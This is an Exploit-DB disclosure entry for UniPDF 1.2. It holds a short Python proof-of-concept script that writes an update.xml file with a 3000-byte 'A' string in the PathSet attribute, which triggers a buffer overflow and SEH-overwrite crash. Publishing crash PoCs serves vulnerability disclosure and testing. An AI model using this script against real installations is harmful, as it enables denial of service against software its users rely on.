UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)

EDB-ID:

36841

CVE:


EDB Verified:

Author:

Avinash Thapa

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2015-04-27

Vulnerable App: 
# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
# Author : Avinash Kumar Thapa "-Acid"
# Date of Testing :  25th April 2015
# Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe
# Steps to reproduce the Crash is:
#   Step 1: Run the POC
#   Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there
#   Step 3 : Run the UniPdf.exe 

buff2 = "\x41" * 3000
crash = "      <config>\n"
crash +=  "         <UserDefine>\n"
crash  +=               "<Language ID=\"0\" />\n"
crash +=                "<Path PathSet=\""+buff2+"\" Path=\"\" />\n"
crash +=                "<ImageFormat set=\"2\" />\n"
crash +=                "<Res set=\"96\" />\n"
crash +=                "<bit set=\"24\" />\n"
crash +=                "<Prefix set=\"\" />\n"
crash +=                "<Doc set=\"1\" />\n"
crash +=                "<Help set=\"1\" />\n"
crash +=             "</UserDefine>\n"
crash +=        "</config>\n"

print "POC Created By -Acid"
print " acid.exploit@gmail.com" 
file = open("update.xml","w")
file.write(crash)
file.close()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services